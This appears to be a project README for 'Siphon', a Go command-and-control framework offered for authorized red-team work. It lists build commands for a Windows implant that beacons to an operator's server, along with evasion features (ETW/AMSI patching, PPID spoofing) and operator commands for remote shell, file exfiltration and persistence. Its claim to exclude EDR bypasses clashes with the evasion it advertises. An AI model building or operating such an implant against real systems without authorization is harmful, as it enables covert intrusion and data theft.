Important
Lightweight Go C2 — ECDH P-256 forward secrecy, AES-256-GCM encryption, uTLS Chrome fingerprinting. Production ready with zero config files.
The implant doesn't store secrets to disk — because that's where EDR and forensics teams always look first.
Modern C2 frameworks focus on feature count over operational security. Siphon prioritizes the inverse: per-session forward secrecy and zero-configuration deployment. No config files touch disk, no plaintext credentials are stored, and every beacon uses ephemeral encryption keys.
Built for environments where every file write is logged and every network connection is inspected. The implant operates entirely from memory with server parameters embedded at compile time.
| KEY | VALUE |
|---|---|
| CRYPTO | ECDH P-256 · HKDF-SHA256 · AES-256-GCM · HMAC-SHA256 — ephemeral keys only |
| TRANSPORT | HTTPS beacon · uTLS Chrome fingerprinting · cookie-based payloads |
| CORE | Lightweight Go implant ~2 MB — zero runtime dependencies |
| EVASION | PPID spoofing · ETW/AMSI patching · CREATE_NO_WINDOW · stripped binaries |
| STACK | Go 1.24+ · Make · Cross-compilation Linux→Windows |
Full build instructions in Makefile. Operator workflow via interactive CLI.
# Prereqs: Go 1.24+, Make
git clone https://github.com/Real-Fruit-Snacks/Siphon.git
cd Siphon
make setup && make server
# Build implant with embedded config
make implant SERVER_PK=<hex> C2_HOST=https://your-c2:443 SLEEP_SEC=10
# Start the server
./build/siphon-server -listen :443 -cert server/certs/server.crt -key server/certs/server.key -auth secret-tokenOPERATOR COMMANDS
implants List checked-in implants
interact <prefix> Select implant by prefix match
cmd <command> Execute shell command
upload <local> <remote> Exfiltrate file from implant
download <remote> <local> Drop file to implant
sleep <seconds> Change beacon interval
persist <method> Install persistence (registry/schtask/startup)
selfdestruct Remove implant and clean up
BUILD TARGETS
make setup Generate ECDH keypair + TLS certificate
make server Build C2 server (Linux amd64, stripped)
make implant Build implant (Windows amd64, cross-compiled)
make implant-linux Build implant (Linux amd64, for testing)
make clean Remove build artifacts and generated keys
ARCHITECTURE
shared/types.go Protocol types: Beacon, Task, TaskResult, Envelope
server/ ECDH crypto · HTTP handlers · operator CLI
implant/ Transport · tasks · Windows evasion · patches
All configuration bakes at compile time via ldflags — no environment lookups, no secrets on disk.
Built for engagements that are scoped, written, and signed. Read the threat model before the install instructions. Vulnerabilities go through private security advisories, never public issues.
Siphon does not include credential harvesting, lateral movement, privilege escalation, EDR bypasses, log destruction, or payload generation — and never will.
License: MIT · Security policy · Contributing · Changelog · Part of Real-Fruit-Snacks — building offensive security tools, one wave at a time.